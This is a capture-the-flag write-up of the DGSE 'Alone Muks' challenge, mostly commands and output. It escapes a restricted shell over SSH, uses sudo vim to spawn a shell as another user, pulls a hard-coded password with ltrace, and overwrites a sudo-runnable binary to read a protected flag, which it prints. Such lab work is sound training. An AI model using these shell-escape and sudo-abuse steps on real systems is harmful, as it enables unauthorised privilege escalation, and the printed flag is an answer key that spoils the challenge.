Writeup DGSE - CTF - Alone Muks
This article describes my solution for the 100-point challenge called “Alone Muks”.
Introduction
Lors de votre récent séjour à Evil Country, vous êtes parvenu à brancher un dispositif sur le camion effectuant la livraison.
Il faut maintenant trouver une faille sur le système pour pouvoir prendre le contrôle du camion autonome de la marque Lates et le rediriger vers un point d'extraction.
Un agent a posé un dispositif nous permettant d'accéder au système de divertissement du véhicule. A partir de ce dernier, remontez jusqu'au système de navigation.
Connectez-vous en SSH au camion.
Identifiants: user:user
Le serveur est réinitialisé périodiquement.
Port : 5004
Le flag est de la forme DGSESIEE{hash}
Start
So we need to connect to the server via SSH on port 5004 and try to retrieve the flag. Be aware that this challenge is in the pwn category, so if we break stuff (and we will), it’s normal…
ssh -p 5004 user@challengecybersec.fr
The authenticity of host '[challengecybersec.fr]:5004 ([51.159.59.20]:5004)' can't be established.
ECDSA key fingerprint is SHA256:rpIUFQ+ekb9WdvHELYrgoggGEKupuCRxNcS5eUS03Eg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[challengecybersec.fr]:5004,[51.159.59.20]:5004' (ECDSA) to the list of known hosts.
user@challengecybersec.fr's password:
Linux 3a92d0c53adf 4.9.0-13-amd64 #1 SMP Debian 4.9.228-1 (2020-07-05) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Nov 4 11:51:07 2020 from 92.170.196.41
=============================================================
LATES Motors Inc
LATES Mortors Entertainment System v6.2
Please enter your credentials
=============================================================
Username: admin
Password: admin
Wrong username !
Username: admin
Password: password
Wrong username !
Username: ^CTraceback (most recent call last):
File "/home/user/login.py", line 12, in <module>
user = raw_input("Username: ")
KeyboardInterrupt
user@3a92d0c53adf:~$ id
-rbash: id: command not found
user@3a92d0c53adf:~$ whoami
-rbash: whoami: command not found
user@3a92d0c53adf:~$
As soon as we initiate the SSH connection, we are asked for a username and a password. I try classic things like admin:admin or admin:password. Well I didn’t want to start testing all the username and password pairs I had in mind so I decided to quit by performing a Ctrl+c.
By doing this I stay “connected” to a shell user@3a92d0c53adf, so I try some classic commands to find out who I am id and whoami.
As you can see, the commands I send are not recognized and we have an important information that is displayed: we are in restricted shell (rbash). A restricted shell is used to set up an environment more controlled than the standard shell.
The first objective is to escape the restricted shell. To do this, we can initiate the SSH connection by passing the -t flag which allows to force the allocation of the pseudo-terminal.
ssh -p 5004 user@challengecybersec.fr -t "sh"
user@challengecybersec.fr's password:
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
So by passing sh to the -t flag, I ask SSH to initiate my connection with sh. We now have a normal shell.
Privilege escalation
As soon as you connect to a server via SSH, if there is one command that you must always execute, it is sudo -l. The -l flag lists the allowed (and forbidden) commands for the invoking user (or the user specified by the -U option) on the current host.
sudo -l
Matching Defaults entries for user on 3a92d0c53adf:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
env_keep+=LD_PRELOAD
User user may run the following commands on 3a92d0c53adf:
(globalSystem) NOPASSWD: /usr/bin/vim
In our case, we see that the globalSystem user can use the vim command without a password.
(globalSystem) NOPASSWD: /usr/bin/vim
As you may know vim can execute shell commands, let’s take advantage of this feature to become the globalSystem user. This is a typical case of privilege elevation.
sudo -u globalSystem vim -c "!bash"
mesg: cannot open /dev/pts/0: Permission denied
globalSystem@3a92d0c53adf:/home/user$ id
uid=1001(globalSystem) gid=1001(globalSystem) groups=1001(globalSystem)
globalSystem@3a92d0c53adf:/home/user$
I use the -u flag to specify the user that should be used to execute a command, and the -c flag to execute a command via vim, here I run bash.
Here we are! Via the command id we see that we are the globalSystem user.
Pwn
As mentioned before, let’s list again what can be done with the sudo command.
globalSystem@3a92d0c53adf:/home/user$ sudo -l
Matching Defaults entries for globalSystem on 3a92d0c53adf:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
env_keep+=LD_PRELOAD
User globalSystem may run the following commands on 3a92d0c53adf:
(navigationSystem) NOPASSWD: /usr/bin/update
The user navigationSystem can execute /usr/bin/update without a password.
When looking for flags in this type of challenge, we notice that they are often located in the user’s folders, so /home/user where user is the user in question. The following command lists the files in /home.
globalSystem@3a92d0c53adf:/home/user$ find /home/ -type f
/home/user/.bash_logout
/home/user/.bashrc
/home/user/.profile
/home/user/bin/du_
/home/user/.bash_profile
/home/user/login.py
/home/navigationSystem/flag.txt
/home/navigationSystem/.bash_logout
/home/navigationSystem/.bashrc
/home/navigationSystem/.profile
/home/globalSystem/.bash_logout
/home/globalSystem/.bashrc
/home/globalSystem/.profile
Have you seen the flag.txt file in /home/navigationSystem? I think that’s our flag.
But we got a little off topic. I remind you that you can run /usr/bin/update without a password. Let’s give it a try.
globalSystem@3a92d0c53adf:~$ sudo -u navigationSystem /usr/bin/update
usage : /usr/bin/update password
globalSystem@3a92d0c53adf:~$ sudo -u navigationSystem /usr/bin/update test
Wrong password
We need a password to execute this command. To analyse this binary, we have to retrieve it before.
cp /usr/binupdate /dev/shm/
Then on your local computer.
scp -P 5004 user@challengecybersec.fr:/dev/shm/update .
Let’s try to trace this binary.
ltrace ./update test
[...]
strcmp("AloneIsTheBest", "test") = -32
puts("Wrong password"Wrong password
The password seems to be AloneIsTheBest. Let’s try it for real!
globalSystem@3a92d0c53adf:~$ sudo -u navigationSystem /usr/bin/update AloneIsTheBest
Deploying upgrade vehicle, please wait
[#### ] 8%
Deploying upgrade vehicle, please wait
[##### ] 8%
Deploying upgrade vehicle, please wait
[##### ] 8%
Deploying upgrade vehicle, please wait
[##### ] 8%
Deploying upgrade vehicle, please wait
[##### ] 8%
Deploying upgrade vehicle, please wait
[##### ] 8%
The deployment of the vehicle never turned out well, yet another feature developed by Microsoft…
Don’t forget that it’s a pwn type challenge, there’s something to break… We have the file /home/navigationSystem/flag.txt which belongs to the user navigationSystem and only readable by him himself (-r--------).
globalSystem@b43e27468d7b:/home/user$ ls -lah /home/navigationSystem/flag.txt
-r-------- 1 navigationSystem navigationSystem 43 Nov 1 10:52 /home/navigationSystem/flag.txt
The goal here is to edit the /usr/bin/update file and replace its contents with the following.
#! /usr/bin/env bash
/bin/cat /home/navigationSystem/flag.txt
The file /usr/bin/update will be executed with navigationSystem rights, so we will be able to read the file /home/navigationSystem/flag.txt.
globalSystem@3a92d0c53adf:~$ sudo -u navigationSystem /usr/bin/update
DGSESIEE{44adfb64ff382f6433eeb03ed829afe0}
Mission accomplished, we managed to read the file containing the flag to validate this challenge.